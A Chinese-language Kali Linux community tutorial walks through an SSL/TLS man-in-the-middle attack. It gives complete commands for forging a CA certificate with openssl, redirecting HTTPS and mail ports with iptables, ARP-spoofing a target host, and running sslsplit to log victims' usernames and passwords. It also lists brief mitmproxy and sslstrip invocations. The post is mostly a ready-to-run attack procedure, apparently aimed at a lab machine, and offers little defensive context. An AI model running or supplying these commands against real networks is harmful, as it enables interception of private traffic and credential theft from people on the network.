SSL\TLS中间人攻击-Kali Linux社区-电脑端-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网

SSL\TLS中间人攻击

  • 攻击者位于客户端和服务器通信链路中

    • ARP

    • DHCP

    • 修改网关

    • 修改DNS

    • 修改HOSTS

    • ICMP\STP\OSPF

    • 加密流量

 

  • 攻击的前提

    • 客户端已经信任伪造证书颁发机构

    • 攻击者控制了核心证书颁发机构

    • 客户端程序禁止了显示证书错误告警信息

    • 攻击者已经控制客户端,并强制其信任伪造证书

 

SSLsplit

  • 透明SSL/TLS中间人攻击工具

  • 对客户端伪装为服务器,对服务器伪装成普通客户端

  • 伪装服务器需要伪造证书

  • 支持SSL/TLS加密的SMTP\POP4\FTP等通信中间人攻击

  • 利用openssl生成证书私钥

openssl  genrsa   -out  ca.key  2048

image

 

  • 利用私钥签名生成证书

 

openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

image

 

  • 启动路由

sysctl -w net.ipv4.ip_forward=1

image

 

  • 配置iptables端口转发规则

iptables -t nat -F  (全部清空)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
iptables -t nat -L

image

 

  • 下一步就是要进行ARP欺骗,看下我们的靶机

image

 

  • ARP欺骗

arpspoof -i eth0 -t  192.168.0.118 -r 192.168.0.1

image

 

image

 

  • 启动SSLsplit

mkdir -p test/logdir
sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

image

 

  • 之后靶机访问网站都是使用我们伪造的证书,之后我们在logdir里面可以看到日志,包括用户数据的用户名和密码等等

 

 

Mitmproxy  

mitmproxy -T --host -w mitmproxy.log

这个不演示了,也是一样,搞个ARP欺骗,侦听一个端口,就行了

 

SSLstrip

  • 与之前两种工具不同,将客户端到中间人之间的流量变为明文

sslstrip  -l 8080
请登录后发表评论

    没有回复内容